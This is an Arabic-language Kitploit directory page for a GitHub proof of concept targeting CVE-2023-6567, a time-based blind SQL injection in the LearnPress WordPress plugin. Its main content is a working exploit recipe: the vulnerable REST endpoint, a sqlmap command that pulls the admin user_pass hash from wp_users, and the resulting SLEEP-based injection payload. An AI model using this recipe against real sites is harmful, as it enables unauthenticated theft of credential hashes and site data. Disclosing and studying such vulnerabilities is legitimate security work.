Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-6567-poc — إثبات مفهوم لاستغلال ثغرة حقن SQL أعمى قائم على الوقت في إضافة LearnPress الخاصة بووردبريس، مما يسمح للمهاجمين غير المصادق عليهم باستخراج بيانات حساسة عبر معامل order_by. | Kitploit
أدوات/GitHubGitHub/mimiloveexe/cve-2023-6567-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmimiloveexe/cve-2023-6567-poc

CVE-2023-6567-poc

إثبات مفهوم لاستغلال ثغرة حقن SQL أعمى قائم على الوقت في إضافة LearnPress الخاصة بووردبريس، مما يسمح للمهاجمين غير المصادق عليهم باستخراج بيانات حساسة عبر معامل order_by.

عرض المستودع
48منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-6567-poc

حقن SQL زمني (Time-based SQLi)

الوصف لا يقوم الإضافة بتعقيم وهروب معامل order_by بشكل صحيح قبل استخدامه في جملة SQL، مما يؤدي إلى ثغرة حقن SQL يمكن استغلالها من قبل المستخدمين غير المصادق عليهم

  1. طلب GET القابل للاستغلال: https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html

  2. احفظ طلب GET

  3. sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'

  4. استأنف sqlmap نقطة (نقاط) الحقن التالية من الجلسة المخزنة:


Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html

تنزيل الأداة